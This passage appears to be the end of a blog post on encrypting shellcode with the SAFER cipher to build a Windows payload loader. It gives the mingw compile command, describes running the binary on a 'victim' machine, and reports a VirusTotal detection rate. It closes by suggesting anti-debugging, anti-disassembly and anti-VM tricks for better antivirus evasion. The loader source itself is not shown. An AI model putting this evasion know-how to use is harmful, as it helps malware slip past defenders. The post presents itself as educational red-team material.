x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive

cryptography

And run it at the victim’s machine (Windows 10 x64 v1903 in my case):

cryptography

cryptography

As you can see, our decrypted shellcode is modified: padding \x90 is working as expected.

Calc entropy and upload to VirusTotal:

python3 entropy.py -f ./hack.exe

cryptography

cryptography

https://www.virustotal.com/gui/file/65c5a47a5c965647f5724e520b23e947deb74ef48b7b961f8f159cdd9c392deb/detection

24 of of 70 AV engines detect our file as malicious as expected.

As you can see, this algorithm encrypts the payload quite well, but it is detected by many AV engines and is poorly suited for bypassing them, but this is most likely due to the fact that a well-studied method of launching the payload is used. if you apply anti-debugging, anti-disassembly and anti-VM tricks, the result will be better.

The Singapore government has considered using SAFER with a 128-bit key for various applications due to its lack of patent, copyright, or other restrictions, making it an attractive choice for widespread adoption.

I hope this post spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.

SAFER
Malware and cryptography 1
source code in github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine

❌
❌